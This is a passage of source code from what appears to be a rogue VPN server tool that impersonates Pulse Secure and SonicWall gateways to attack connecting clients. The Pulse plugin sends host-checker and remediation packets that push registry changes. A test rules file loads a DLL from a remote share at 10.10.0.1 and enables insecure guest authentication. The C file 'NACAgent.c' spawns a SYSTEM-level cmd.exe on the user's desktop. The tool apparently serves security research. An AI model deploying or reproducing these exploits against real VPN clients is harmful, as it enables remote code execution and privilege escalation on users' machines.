bytearray() inner_eap_data += EXPANDED_JUNIPER.to_bytes(4, 'big') inner_eap_data += (2).to_bytes(4, 'big') # subtype: J2 inner_eap_data += J2_PASSREQ.to_bytes(1, 'big') # J2 password request inner_eap = EAPPacket(vendor=JUNIPER_1, code=EAP_REQUEST, identifier=0x00, eap_data=inner_eap_data) # Build the AVP data from inner EAP data (without vendor) avp = AVP(code=0x4f, flags=0x40, value=inner_eap.to_bytes()[4:]) # Add AVP data to outer EAP data outer_eap_data += avp.to_bytes(include_padding=True) # Construct outer EAP packet outer_eap = EAPPacket(vendor=JUNIPER_1, code=EAP_REQUEST, identifier=0x05, eap_data=outer_eap_data) # Build IFT packet reply = IFTPacket(vendor_id=VENDOR_TCG, message_type=0x05, message_identifier=0x01FA, message_value=outer_eap.to_bytes()) # Append to output buffer outbuf += reply.to_bytes() elif b'policy:vc0' in eap_in.eap_data and b'status:NOTOK' in eap_in.eap_data: self.logger.info('Received host checker NOT OK response. Sending remediation packet..') # TODO: same here, we need to actually parse the result # The client indicated that the policy was not OK, so we need to send a remediation packet # EAP within AVP within EAP within EAP within IF-T/TLS outer_eap_data = bytearray() outer_eap_data += EXPANDED_JUNIPER.to_bytes(4, 'big') outer_eap_data += (1).to_bytes(4, 'big') # This is the EAP data encapsulated in AVP (which is itself encapsulated in EAP/IF-T/TLS) inner_eap_data = bytearray() inner_eap_data += EXPANDED_JUNIPER.to_bytes(4, 'big') inner_eap_data += (3).to_bytes(4, 'big') inner_eap_data += b'\x01' # no idea, maybe number of policies? # Build a host-checker policy with a registry command commands = FunkManager.remediation_command(policy_id=self.host_checker_policy_id) policy = FunkManager.generate(commands) # Wrap it in an EAP request inner_eap_data += policy inner_eap = EAPPacket(vendor=JUNIPER_1, code=EAP_REQUEST, identifier=0x03, eap_data=inner_eap_data) # Build the AVP data from inner EAP data (without vendor) avp = AVP(code=0x4f, flags=0x40, value=inner_eap.to_bytes()[4:]) # Add AVP data to outer EAP data outer_eap_data += avp.to_bytes(include_padding=True) # Construct outer EAP packet outer_eap = EAPPacket(vendor=JUNIPER_1, code=EAP_REQUEST, identifier=0x05, eap_data=outer_eap_data) # Build IFT packet reply = IFTPacket(vendor_id=VENDOR_TCG, message_type=0x05, message_identifier=0x01FA, message_value=outer_eap.to_bytes()) # Append to output buffer outbuf += reply.to_bytes() elif self.is_funk_message(eap_in.eap_data): self.logger.info('Received funk message') # The client sends an EAP_RESPONSE with a compressed policy message # IFT_CLIENT_AUTH_RESPONSE: Id=0x0000 # EAP_RESPONSE: Vendor=JUNIPER_1, Code=EAP_RESPONSE, Id=0x05, Length=0x088 # EXPANDED_JUNIPER: Subtype=0x01 # AVP: 0x0D6D=admin.. # Followed by compressed policy message from client # => 0000000000 00 00 55 97 00 00 00 06 00 00 00 9c 00 00 00 00 ..U............. # => 0000000010 00 0a 4c 01 02 05 00 88 fe 00 0a 4c 00 00 00 01 ..L........L.... # => 0000000020 00 00 0d 6d 80 00 00 11 00 00 05 83 61 64 6d 69 ...m........admi # => 0000000030 6e 00 0d 61 00 00 00 4f 40 00 00 65 02 03 00 5d n..a...O@..e...] # => 0000000040 fe 00 0a 4c 00 00 00 03 01 00 00 00 16 c0 00 00 ...L............ # => 0000000050 4e 00 00 05 83 00 00 00 40 78 9c 63 60 e0 79 72 N.......@x.c`.yr # => 0000000060 80 81 81 87 81 81 b5 19 48 3d 05 b2 95 40 6c c7 ........H=...@l. # => 0000000070 e4 e4 d4 82 12 5d 9f c4 bc f4 d2 c4 f4 54 2b 85 .....].......T+. # => 0000000080 d4 3c dd d0 60 06 20 e0 f9 dc c0 c0 20 00 51 cf .<..`. ..... .Q. # => 0000000090 c0 08 00 ed ae 0e 5b 00 00 4f 4b 0a ......[..OK. # Decompressed message: # 0x0ce5: Accept-Language: en-US # 0x0cf3: 1 # 00000000 00 00 0c e4 c0 00 00 0c 00 00 05 83 00 00 0c e5 |...äÀ..........å| # 00000010 c0 00 00 22 00 00 05 83 41 63 63 65 70 74 2d 4c |À.."....Accept-L| # 00000020 61 6e 67 75 61 67 65 3a 20 65 6e 2d 55 53 00 00 |Language: en-US..| # 00000030 00 00 0c f3 80 00 00 10 00 00 05 83 00 00 00 01 |...ó............| # TODO: # we should parse the client message, but for now we can just reply with # some AVP codes which indicate an error has occurred # at this point we might be able to complete auth instead of sending an error (to avoid disconnect) avp_list = [] avp_list.append(AVP(code=0xD57, flags=AVP_VENDOR, vendor=VENDOR_JUNIPER2, value=b'\x00\x00\x00\x00')) avp_list.append(AVP(code=0xD60, flags=AVP_VENDOR, vendor=VENDOR_JUNIPER2, value=b'\x00\x00\x00\x00')) # Create the EAP data eap_data = bytearray() # EXPANDED_JUNIPER struct eap_data += EXPANDED_JUNIPER.to_bytes(4, 'big') eap_data += (1).to_bytes(4, 'big') # subtype # Add AVPs for avp in avp_list: eap_data += avp.to_bytes(include_padding=True) # Construct EAP packet eap = EAPPacket(vendor=JUNIPER_1, code=EAP_REQUEST, identifier=0x06, eap_data=eap_data) # Build IFT packet reply = IFTPacket(vendor_id=VENDOR_TCG, message_type=IFT_CLIENT_AUTH_CHALLENGE, message_identifier=0x01FB, message_value=eap.to_bytes()) # Append to output buffer outbuf += reply.to_bytes() elif eap_in.length == 0x0C and self.expanded_juniper_subtype(eap_in.eap_data) == 1: # Now the client sends an EAP_RESPONSE .. # containing an empty EXPANDED_JUNIPER structure with subtype 0x01 """ # Client: # IFT_CLIENT_AUTH_RESPONSE: Id=0x0000 # EAP: Vendor=JUNIPER_1, Code=EAP_RESPONSE, Id=0x06, Length=0x0C # EXPANDED_JUNIPER: Subtype=0x01 => 0000000000 00 00 55 97 00 00 00 06 00 00 00 20 00 00 00 00 ..U........ .... => 0000000010 00 0a 4c 01 02 06 00 0c fe 00 0a 4c 00 00 00 01 ..L........L.... """ # we can just reply to with an EAP_FAILURE """ # Server: # IFT_CLIENT_AUTH_CHALLENGE: Id=0x01fc # EAP: Vendor=JUNIPER_1, Code=EAP_FAILURE, Id=0x06, Length=0x04 <= 0000000000 00 00 55 97 00 00 00 05 00 00 00 18 00 00 01 fc ..U............. <= 0000000010 00 0a 4c 01 04 06 00 04 ..L..... """ self.logger.error('Host checker NOT OK') # Construct EAP packet eap = EAPPacket(vendor=JUNIPER_1, code=EAP_FAILURE, identifier=0x06, eap_data=bytearray()) # Build IFT packet reply = IFTPacket(vendor_id=VENDOR_TCG, message_type=IFT_CLIENT_AUTH_CHALLENGE, message_identifier=0x01FC, message_value=eap.to_bytes()) # Append to output buffer outbuf += reply.to_bytes() # Receive host-checker policy request and send back policy elif self.is_policy_request(eap_in.eap_data): self.logger.info('Received host-checker policy request.') if not self.host_checker_rules: self.logger.error("No host checker rules loaded. Not sending policy.") return outbuf # EAP within AVP within EAP within IF-T/TLS outer_eap_data = bytearray() outer_eap_data += EXPANDED_JUNIPER.to_bytes(4, 'big') # EXPANDED_JUNIPER outer_eap_data += (1).to_bytes(4, 'big') # subtype # This is the EAP data encapsulated in AVP (which is itself encapsulated in EAP/IF-T/TLS) inner_eap_data = bytearray() inner_eap_data += EXPANDED_JUNIPER.to_bytes(4, 'big') # EXPANDED_JUNIPER inner_eap_data += (3).to_bytes(4, 'big') # subtype (host checker) inner_eap_data += (1).to_bytes(1, 'big') # number of policies self.logger.info(f'Sending host checker policy: {self.host_checker_policy_id}') commands = FunkManager.registry_command(rules=self.host_checker_rules, server_time=True, policy_id=self.host_checker_policy_id) policy = FunkManager.generate(commands) self.logger.info(f'Generated host checker policy: {policy.hex()}') # Wrap it in an EAP request inner_eap_data += policy inner_eap = EAPPacket(vendor=JUNIPER_1, code=EAP_REQUEST, identifier=0x02, eap_data=inner_eap_data) # Build the AVP data from inner EAP data (without vendor) avp = AVP(code=0x4f, flags=0x40, value=inner_eap.to_bytes()[4:]) # Add AVP data to outer EAP data outer_eap_data += avp.to_bytes(include_padding=True) # Construct outer EAP packet outer_eap = EAPPacket(vendor=JUNIPER_1, code=EAP_REQUEST, identifier=0x04, eap_data=outer_eap_data) # Build IFT packet reply = IFTPacket(vendor_id=VENDOR_TCG, message_type=0x05, message_identifier=0x01F9, message_value=outer_eap.to_bytes()) # Append to output buffer outbuf += reply.to_bytes() # Prompt for host-checker policy elif self.is_client_info(eap_in.eap_data): self.logger.info('Received AVP structures with OS data. Prompting for host checker..') # The client indicated that the policy was not OK, so we need to send a remediation packet # EAP within AVP within EAP within IF-T/TLS outer_eap_data = bytearray() outer_eap_data += EXPANDED_JUNIPER.to_bytes(4, 'big') outer_eap_data += (1).to_bytes(4, 'big') # This is the EAP data encapsulated in AVP (which is itself encapsulated in EAP/IF-T/TLS) inner_eap_data = bytearray() inner_eap_data += EXPANDED_JUNIPER.to_bytes(4, 'big') inner_eap_data += (3).to_bytes(4, 'big') inner_eap_data += b'\x21' # unknown: prompt for host-checker policy request inner_eap = EAPPacket(vendor=JUNIPER_1, code=EAP_REQUEST, identifier=0x01, eap_data=inner_eap_data) # Build the AVP data from inner EAP data (without vendor) avp = AVP(code=0x4f, flags=0x40, value=inner_eap.to_bytes()[4:]) # Add AVP data to outer EAP data outer_eap_data += avp.to_bytes(include_padding=True) # Construct outer EAP packet outer_eap = EAPPacket(vendor=JUNIPER_1, code=EAP_REQUEST, identifier=0x03, eap_data=outer_eap_data) # Build IFT packet reply = IFTPacket(vendor_id=VENDOR_TCG, message_type=0x05, message_identifier=0x01F8, message_value=outer_eap.to_bytes()) # Append to output buffer outbuf += reply.to_bytes() return outbuf def _wrap_packet(self, packet_data, client): """Wrap an IP packet in IF-T/TLS format.""" # Create IF-T packet with the IP packet as the message value packet = IFTPacket( vendor_id=VENDOR_JUNIPER, message_type=0x4, message_identifier=0, message_value=packet_data ) return packet.to_bytes() def handle_data(self, data, client_socket, client_ip): try: client_socket.setblocking(True) client_socket.settimeout(10) connection_id, _ = self.packet_handler.create_session(client_socket, self._wrap_packet) buf = bytearray() if data: buf.extend(data) while True: # Read more data if we don't have a full header while len(buf) < 16: try: chunk = client_socket.recv(self.buffer_size) if not chunk: return True buf.extend(chunk) except (socket.timeout, ssl.SSLWantReadError, BlockingIOError): continue # Parse the message length from the header msg_len = int.from_bytes(buf[8:12], 'big') if msg_len < 16 or msg_len > self.max_packet_size: self.logger.error(f"Invalid IF-T/TLS length {msg_len}; dropping connection") return False # If we don't have the full message yet, read more if len(buf) < msg_len: try: chunk = client_socket.recv(self.buffer_size) if not chunk: return True buf.extend(chunk) continue except (socket.timeout, ssl.SSLWantReadError, BlockingIOError): continue # We have a full message packet = bytes(buf[:msg_len]) del buf[:msg_len] try: # Pass connection_id to process resp = self.process(packet, client_socket, connection_id) if resp: client_socket.sendall(resp) except Exception as e: self.logger.error(f"Error processing packet: {e}") except Exception as e: self.logger.error(f"Error in handle_data: {e}") finally: try: self.packet_handler.destroy_session(connection_id) client_socket.close() except Exception: pass return True def process(self, data, client_socket, connection_id): """Parse a complete IF-T/TLS frame and build any response frames""" outbuf = bytearray() while data: # Parse a single IF-T/TLS packet self.logger.debug(f'inbuf: {data.hex()}') try: reader = io.BytesIO(data) packet = IFTPacket.from_io(reader) data = reader.read() except Exception as e: self.logger.error(f'Failed to parse IF-T/TLS packet: {e}') break # Handle packet types if packet.message_type == IFT_VERSION_REQUEST: self.logger.info('Got IFT_VERSION_REQUEST') reply = IFTPacket( vendor_id=VENDOR_TCG, message_type=IFT_VERSION_RESPONSE, message_identifier=0x01F5, message_value=(2).to_bytes(4, 'big') # version 2 ) outbuf += reply.to_bytes() elif packet.message_type == IFT_TLS_CLIENT_INFO: self.logger.info('Got IFT_TLS_CLIENT_INFO') auth_data = packet.message_value.decode(errors='ignore').strip('\x00\n') self.logger.info(f'Client info: {auth_data}') reply = IFTPacket( vendor_id=VENDOR_TCG, message_type=IFT_CLIENT_AUTH_CHALLENGE, message_identifier=0x01F6, message_value=JUNIPER_1.to_bytes(4, 'big') ) outbuf += reply.to_bytes() elif packet.message_type == IFT_CLIENT_AUTH_RESPONSE: self.logger.info('Got IFT_CLIENT_AUTH_RESPONSE') outbuf += self.parse_eap_packet(packet.message_value, client_socket, connection_id) elif packet.message_type == 0x89: # Logout request self.logger.info('Got logout request') return bytearray() elif packet.message_type == 0x4: # Tunnelled IP packet if packet.message_value and packet.message_value[0] == 0x45: # IPv4 self.logger.debug('Got IP packet') self.packet_handler.handle_client_packet( packet.message_value, connection_id ) self.logger.debug(f'outbuf: {outbuf.hex()}') return outbuf ================================================ FILE: src/nachovpn/plugins/pulse/test/example_rules.json ================================================ [ { "rulename": "AllowInsecureGuestAuth", "subkey": "SYSTEM\\CurrentControlSet\\Services\\LanmanWorkstation\\Parameters", "regname": "AllowInsecureGuestAuth", "hive": "HKEY_LOCAL_MACHINE", "value": 1, "type": "DWORD" }, { "rulename": "Payload", "subkey": "SOFTWARE\\Microsoft\\Wow64\\x86", "regname": "ipconfig.exe", "hive": "HKEY_LOCAL_MACHINE", "value": "\\\\10.10.0.1\\share\\payload.dll", "type": "String" } ] ================================================ FILE: src/nachovpn/plugins/pulse/test/test_policy.py ================================================ from nachovpn.plugins.pulse.funk_parser import FunkManager from nachovpn.plugins.pulse.plugin import AVP, EAPPacket, IFTPacket, EXPANDED_JUNIPER, \ JUNIPER_1, EAP_REQUEST, VENDOR_TCG, AVP_CODE_EAP_MESSAGE, IFT_CLIENT_AUTH_CHALLENGE import os import zlib import logging import difflib logging.basicConfig(level=logging.DEBUG) def hexdump(data: bytes): def to_printable_ascii(byte): return chr(byte) if 32 <= byte <= 126 else "." offset = 0 while offset < len(data): chunk = data[offset : offset + 16] hex_values = " ".join(f"{byte:02x}" for byte in chunk) ascii_values = "".join(to_printable_ascii(byte) for byte in chunk) print(f"{offset:08x} {hex_values:<48} |{ascii_values}|") offset += 16 def build_remediation_packet(): outbuf = b'' # EAP within AVP within EAP within IF-T/TLS outer_eap_data = b'' outer_eap_data += EXPANDED_JUNIPER.to_bytes(4, 'big') outer_eap_data += (1).to_bytes(4, 'big') # This is the EAP data encapsulated in AVP (which is itself encapsulated in EAP/IF-T/TLS) inner_eap_data = b'' inner_eap_data += EXPANDED_JUNIPER.to_bytes(4, 'big') inner_eap_data += (3).to_bytes(4, 'big') inner_eap_data += b'\x01' # no idea, maybe number of policies? # Build a host-checker policy with a registry command commands = FunkManager.remediation_command() policy = FunkManager.generate(commands) # Wrap it in an EAP request inner_eap_data += policy inner_eap = EAPPacket(vendor=JUNIPER_1, code=EAP_REQUEST, identifier=0x03, eap_data=inner_eap_data) # Build the AVP data from inner EAP data (without vendor) avp = AVP(code=0x4f, flags=0x40, value=inner_eap.to_bytes()[4:]) # Add AVP data to outer EAP data outer_eap_data += avp.to_bytes(include_padding=True) print (f'Padding required: {avp.padding_required()}') # Construct outer EAP packet outer_eap = EAPPacket(vendor=JUNIPER_1, code=EAP_REQUEST, identifier=0x05, eap_data=outer_eap_data) # Build IFT packet reply = IFTPacket(vendor_id=VENDOR_TCG, message_type=0x05, message_identifier=0x01FA, message_value=outer_eap.to_bytes()) # Append to output buffer outbuf += reply.to_bytes() return outbuf def build_policy(): outbuf = b'' # EAP within AVP within EAP within IF-T/TLS outer_eap_data = b'' outer_eap_data += EXPANDED_JUNIPER.to_bytes(4, 'big') outer_eap_data += (1).to_bytes(4, 'big') # This is the EAP data encapsulated in AVP (which is itself encapsulated in EAP/IF-T/TLS) inner_eap_data = b'' inner_eap_data += EXPANDED_JUNIPER.to_bytes(4, 'big') inner_eap_data += (3).to_bytes(4, 'big') inner_eap_data += b'\x01' # no idea, maybe number of policies? # Build a host-checker policy with a registry command commands = FunkManager.registry_command() policy = FunkManager.generate(commands) # Wrap it in an EAP request inner_eap_data += policy inner_eap = EAPPacket(vendor=JUNIPER_1, code=EAP_REQUEST, identifier=0x02, eap_data=inner_eap_data) # Build the AVP data from inner EAP data (without vendor) avp = AVP(code=0x4f, flags=0x40, value=inner_eap.to_bytes()[4:]) # Add AVP data to outer EAP data outer_eap_data += avp.to_bytes(include_padding=True) print (f'Padding required: {avp.padding_required()}') # Construct outer EAP packet outer_eap = EAPPacket(vendor=JUNIPER_1, code=EAP_REQUEST, identifier=0x04, eap_data=outer_eap_data) # Build IFT packet reply = IFTPacket(vendor_id=VENDOR_TCG, message_type=0x05, message_identifier=0x01F9, message_value=outer_eap.to_bytes()) # Append to output buffer outbuf += reply.to_bytes() return outbuf def compare(file_1, file_2): with open(file_1, 'rb') as f: example_bytes = f.read() with open(file_2, 'rb') as f: generated_data = f.read() # Diff generated data with example file bytes1 = list(example_bytes) bytes2 = list(generated_data) diff = difflib.unified_diff( [f"{b:02x}" for b in bytes1], [f"{b:02x}" for b in bytes2], lineterm="" ) same = True for line in diff: print(line) same = False if same: print('> No differences found!') def build_remediation(): commands = FunkManager.remediation_command() return FunkManager.generate(commands) def generate_example_files(): os.makedirs(os.path.join(os.path.dirname(__file__), 'examples'), exist_ok=True) # generate example IF-T / host-checker policy client_policy_file = os.path.join(os.path.dirname(__file__), 'examples', 'client_policy_packet.bin') client_policy_data = bytearray() client_policy_data += bytes.fromhex('00 00 55 97 00 00 00 05 00 00 01 CC 00 00 01 F9') client_policy_data += bytes.fromhex('00 0A 4C 01 01 04 01 B8 FE 00 0A 4C 00 00 00 01') client_policy_data += bytes.fromhex('00 00 00 4F 40 00 01 A9 01 02 01 A1 FE 00 0A 4C') client_policy_data += bytes.fromhex('00 00 00 03 01 00 00 00 16 C0 00 01 93 00 00 05') client_policy_data += bytes.fromhex('83 00 00 02 78 78 9C 8D 52 CB 4A 03 31 14 8D 85') client_policy_data += bytes.fromhex('6E A4 0B 57 AE 87 F9 82 A6 D6 56 18 23 0C B5 52') client_policy_data += bytes.fromhex('B1 2F 5A 1F 28 C2 90 49 2E 35 3A 93 0C 49 A6 B5') client_policy_data += bytes.fromhex('D0 85 E0 8F F9 31 82 1F E0 0F 98 99 AA 88 14 34') client_policy_data += bytes.fromhex('AB 7B 0F 27 E7 9E 7B B8 08 D5 5E 5F 50 E5 0E A1') client_policy_data += bytes.fromhex('EA 33 42 B5 B7 17 84 2E CA BA FA BC 7B 38 0E 27') client_policy_data += bytes.fromhex('E1 C0 1B 86 83 2E F1 C7 54 D3 14 2C E8 BA EF 5D') client_policy_data += bytes.fromhex('86 FD 0B 07 05 0C B4 8D 52 BE 4F 02 03 7A 0E 3A') client_policy_data += bytes.fromhex('B2 22 05 82 DB 8D 36 3E 68 E3 46 CB 3F DA 46 E5') client_policy_data += bytes.fromhex('2B 74 2B 95 6F DD AC D0 F2 A4 D3 23 7E F6 A5 8B') client_policy_data += bytes.fromhex('7D 6F 4E 93 DC 41 2A BE 07 66 23 99 A7 31 68 82') client_policy_data += bytes.fromhex('03 2F D3 6A 2E B8 AB 35 CC 84 B1 7A 19 78 3A 4F') client_policy_data += bytes.fromhex('40 70 4C EA EB B2 D0 C2 64 A1 94 75 FD 27 29 7A') client_policy_data += bytes.fromhex('80 25 26 BD B3 EE 75 D4 1F 75 C2 7E 34 08 3B BD') client_policy_data += bytes.fromhex('D3 61 F7 07 C3 E4 71 49 9A 8E 4E CE AF C2 49 F7') client_policy_data += bytes.fromhex('B6 93 50 63 C0 DC D2 98 FD A0 6D 54 B7 CB CC 81') client_policy_data += bytes.fromhex('53 AB 85 9C 95 F0 A5 80 45 AB 89 0B C3 A9 90 2E') client_policy_data += bytes.fromhex('8E 6F 77 1A 52 E0 C4 80 FB 2E 01 B8 19 28 29 AC') client_policy_data += bytes.fromhex('2A 3E 16 64 B7 9F 4A 04 5B 92 39 AB AF 9A 7B AB') client_policy_data += bytes.fromhex('75 17 35 56 78 F5 6B 64 99 0F 26 AC C7 F3 9B 90') client_policy_data += bytes.fromhex('90 C0 8B A9 81 56 13 24 53 1C 5C 18 D8 05 BE 39') client_policy_data += bytes.fromhex('DC C6 3F C2 5D CF E5 D4 D2 BF 1D B9 A5 98 CA A5') client_policy_data += bytes.fromhex('2D 04 E0 31 D3 60 8C 50 F2 F4 D8 38 53 4C 49 2E') client_policy_data += bytes.fromhex('AC 6B 69 E2 02 F0 BD CF 23 A8 BD 3F 21 B4 B3 BE') client_policy_data += bytes.fromhex('33 B4 F5 01 ED 71 D0 C2 00 00 00 00') with open(client_policy_file, 'wb') as f: f.write(client_policy_data) # generate full remediation packet remediation_packet_file = os.path.join(os.path.dirname(__file__), 'examples', 'remediation_packet.bin') remediation_packet_data = bytearray() remediation_packet_data += bytes.fromhex('00 00 55 97 00 00 00 05 00 00 00 B8 00 00 01 FA') remediation_packet_data += bytes.fromhex('00 0A 4C 01 01 05 00 A4 FE 00 0A 4C 00 00 00 01') remediation_packet_data += bytes.fromhex('00 00 00 4F 40 00 00 95 01 03 00 8D FE 00 0A 4C') remediation_packet_data += bytes.fromhex('00 00 00 03 01 00 00 00 16 C0 00 00 7F 00 00 05') remediation_packet_data += bytes.fromhex('83 00 00 00 94 78 9C 63 60 E0 79 72 80 81 81 87') remediation_packet_data += bytes.fromhex('81 81 B5 19 48 7D 00 B2 33 A0 EC 8F 40 B6 00 88') remediation_packet_data += bytes.fromhex('5D 92 5A 5C C2 00 51 E7 03 95 7B 0E 64 DB 81 D9') remediation_packet_data += bytes.fromhex('AC CD 62 41 AE BE AE 2E 9E 8E 21 AE 56 01 FE 3E') remediation_packet_data += bytes.fromhex('9E CE 91 9E 2E B6 65 C9 06 35 26 C6 35 05 F9 39') remediation_packet_data += bytes.fromhex('99 C9 95 F1 46 35 86 35 E5 F9 F9 25 3A C5 A9 40') remediation_packet_data += bytes.fromhex('83 40 40 08 66 36 90 CD 08 34 EF 73 03 12 1F 00') remediation_packet_data += bytes.fromhex('25 39 21 7B 00') remediation_packet_data += bytes.fromhex('00 00 00') # padding (client sends A0 6D 9C) with open(remediation_packet_file, 'wb') as f: f.write(remediation_packet_data) # generate example remediation policy remediation_file = os.path.join(os.path.dirname(__file__), 'examples', 'remediation.bin') remediation_data = bytearray() remediation_data += bytes.fromhex('00 00 00 16 C0 00 00 7F 00 00 05 83 00 00 00 94') remediation_data += bytes.fromhex('78 9C 63 60 E0 79 72 80 81 81 87 81 81 B5 19 48') remediation_data += bytes.fromhex('7D 00 B2 33 A0 EC 8F 40 B6 00 88 5D 92 5A 5C C2') remediation_data += bytes.fromhex('00 51 E7 03 95 7B 0E 64 DB 81 D9 AC CD 62 41 AE') remediation_data += bytes.fromhex('BE AE 2E 9E 8E 21 AE 56 01 FE 3E 9E CE 91 9E 2E') remediation_data += bytes.fromhex('B6 65 C9 06 35 26 C6 35 05 F9 39 99 C9 95 F1 46') remediation_data += bytes.fromhex('35 86 35 E5 F9 F9 25 3A C5 A9 40 83 40 40 08 66') remediation_data += bytes.fromhex('36 90 CD 08 34 EF 73 03 12 1F 00 25 39 21 7B 00') with open(remediation_file, 'wb') as f: f.write(remediation_data) remediation_uncompressed_file = os.path.join(os.path.dirname(__file__), 'examples', 'remediation_uncompressed.bin') remediation_uncompressed_data = zlib.decompress(remediation_data[0x10:]) with open(remediation_uncompressed_file, 'wb') as f: f.write(remediation_uncompressed_data) # create example files generate_example_files() # build + test IF-T packet client_policy_packet_file = os.path.join(os.path.dirname(__file__), 'generated_client_policy_packet.bin') example_client_policy_packet = os.path.join(os.path.dirname(__file__), 'examples', 'client_policy_packet.bin') data = build_policy() print('\n> Generated client policy packet:') hexdump(data) with open(client_policy_packet_file, 'wb') as f: f.write(data) print('\n> Comparing client policy packet with example:') compare(example_client_policy_packet, client_policy_packet_file) # Test remediation policy remediation_file = os.path.join(os.path.dirname(__file__), 'generated_remediation.bin') example_remediation = os.path.join(os.path.dirname(__file__), 'examples', 'remediation.bin') # Uncompressed remediation policy example_remediation_uncompressed = os.path.join(os.path.dirname(__file__), 'examples', 'remediation_uncompressed.bin') remediation_uncompressed = os.path.join(os.path.dirname(__file__), 'generated_remediation_uncompressed.bin') data = build_remediation() print('\n> Generated remediation data:') hexdump(data) # write remediation data to file with open(remediation_file, 'wb') as f: f.write(data) # write uncompressed remediation data to file with open(remediation_uncompressed, 'wb') as f: f.write(zlib.decompress(data[0x10:])) print('\n> Comparing remediation data with example (uncompressed):') compare(example_remediation_uncompressed, remediation_uncompressed) print('\n> Comparing remediation data with example (compressed):') compare(example_remediation, remediation_file) # generate remediation full packet remediation_packet_file = os.path.join(os.path.dirname(__file__), 'generated_remediation_packet.bin') example_remediation_packet = os.path.join(os.path.dirname(__file__), 'examples', 'remediation_packet.bin') data = build_remediation_packet() print('\n> Generated remediation packet:') hexdump(data) with open(remediation_packet_file, 'wb') as f: f.write(data) print('\n> Comparing remediation packet with example:') compare(example_remediation_packet, remediation_packet_file) # Cleanup os.remove(client_policy_packet_file) os.remove(remediation_file) os.remove(remediation_uncompressed) os.remove(remediation_packet_file) ================================================ FILE: src/nachovpn/plugins/sonicwall/__init__.py ================================================ from .plugin import SonicWallPlugin __all__ = ['SonicWallPlugin'] ================================================ FILE: src/nachovpn/plugins/sonicwall/files/NACAgent.c ================================================ #include #include #include #include #include #pragma comment(lib, "wtsapi32.lib") #pragma comment(lib, "userenv.lib") DWORD FindProcessId(const wchar_t* processName) { PROCESSENTRY32W processInfo; processInfo.dwSize = sizeof(processInfo); HANDLE processesSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (processesSnapshot == INVALID_HANDLE_VALUE) { return 0; } if (Process32FirstW(processesSnapshot, &processInfo)) { if (wcscmp(processName, processInfo.szExeFile) == 0) { CloseHandle(processesSnapshot); return processInfo.th32ProcessID; } } while (Process32NextW(processesSnapshot, &processInfo)) { if (wcscmp(processName, processInfo.szExeFile) == 0) { CloseHandle(processesSnapshot); return processInfo.th32ProcessID; } } CloseHandle(processesSnapshot); return 0; } bool PopSystemShell() { BOOL bSuccess = FALSE; STARTUPINFOW si; PROCESS_INFORMATION pi; TOKEN_PRIVILEGES tp; LUID luid; HANDLE oldToken = NULL; HANDLE newToken = NULL; HANDLE privToken = NULL; LPVOID pEnv = NULL; DWORD dwCreationFlags = NORMAL_PRIORITY_CLASS | CREATE_NEW_CONSOLE; ZeroMemory(&si, sizeof(si)); si.cb = sizeof(si); si.lpDesktop = L"Winsta0\\default"; ZeroMemory(&pi, sizeof(pi)); DWORD sessionId; DWORD dwPid = FindProcessId(L"NEGui.exe"); ProcessIdToSessionId(dwPid, &sessionId); if (sessionId == 0xFFFFFFFF || sessionId == 0) { goto CLEANUP_EXIT; } if (WTSQueryUserToken(sessionId, &oldToken)) { if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY | TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_ADJUST_SESSIONID | TOKEN_READ | TOKEN_WRITE, &privToken)) { goto CLEANUP_EXIT; } // Enable SeDebugPrivilege if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid)) { goto CLEANUP_EXIT; } tp.PrivilegeCount = 1; tp.Privileges[0].Luid = luid; tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; // Duplicate our token to &newToken if (!DuplicateTokenEx(privToken, MAXIMUM_ALLOWED, NULL, SecurityIdentification, TokenPrimary, &newToken)) { goto CLEANUP_EXIT; } if (!SetTokenInformation(newToken, TokenSessionId, (void*)&sessionId, sizeof(DWORD))) { goto CLEANUP_EXIT; } if (!AdjustTokenPrivileges(newToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, NULL)) { goto CLEANUP_EXIT; } if (CreateEnvironmentBlock(&pEnv, newToken, TRUE)) { dwCreationFlags |= CREATE_UNICODE_ENVIRONMENT; } // Create process for user with desktop if (!CreateProcessAsUserW(newToken, L"C:\\Windows\\System32\\cmd.exe", NULL, NULL, NULL, FALSE, dwCreationFlags, pEnv, L"C:\\Windows\\System32\\", &si, &pi)) { goto CLEANUP_EXIT; } bSuccess = TRUE; } CLEANUP_EXIT: if (oldToken != NULL) CloseHandle(oldToken); if (newToken != NULL) CloseHandle(newToken); if (privToken != NULL) CloseHandle(privToken); if (pi.hProcess != NULL) CloseHandle(pi.hProcess); if (pi.hThread != NULL) CloseHandle(pi.hThread); if (pEnv != NULL) DestroyEnvironmentBlock(pEnv); return bSuccess; } int main() { if (PopSystemShell()) { return 0; } else { return 1; } } ================================================ FILE: src/nachovpn/plugins/sonicwall/plugin.py ================================================ from nachovpn.plugins import VPNPlugin from flask import Flask, jsonify, request, abort, send_file, make_response from cryptography import x509 from cryptography.x509.oid import NameOID from cryptography.hazmat.primitives.asymmetric import rsa from cryptography.hazmat.primitives import hashes, serialization from cryptography.hazmat.backends import default_backend from cryptography.x509.oid import ExtendedKeyUsageOID import logging import datetime import subprocess import shutil import urllib.parse import base64 import uuid import json import os class SonicWallPlugin(VPNPlugin): def __init__(self, *args, **kwargs): # provide the templates directory relative to this plugin super().__init__(*args, **kwargs, template_dir=os.path.join(os.path.dirname(__file__), 'templates')) self.payload_dir = os.path.join(os.getcwd(), 'payloads') self.files_dir = os.path.join(os.path.dirname(__file__), 'files') os.makedirs(self.payload_dir, exist_ok=True) self.setup_payload() def can_handle_data(self, data, client_socket, client_ip): # CONNECT tunnel is not currently supported return False def can_handle_http(self, handler): user_agent = handler.headers.get('User-Agent', '') if 'SonicWALL NetExtender' in user_agent or \ 'SMA Connect Agent' in user_agent or \ handler.path == '/sonicwall' or \ handler.path == '/sonicwall/ca.crt': return True return False def random_swap(self): return base64.b64encode(base64.b64encode(os.urandom(32))).decode() def _setup_routes(self): # Call the parent class's route setup super()._setup_routes() @self.flask_app.route('/', defaults={'path': ''}, methods=['CONNECT']) @self.flask_app.route('/', methods=['CONNECT']) def handle_connect(path): self.logger.info(f"handle CONNECT: {path}") self.logger.info(request.headers) self.logger.info(request.cookies) 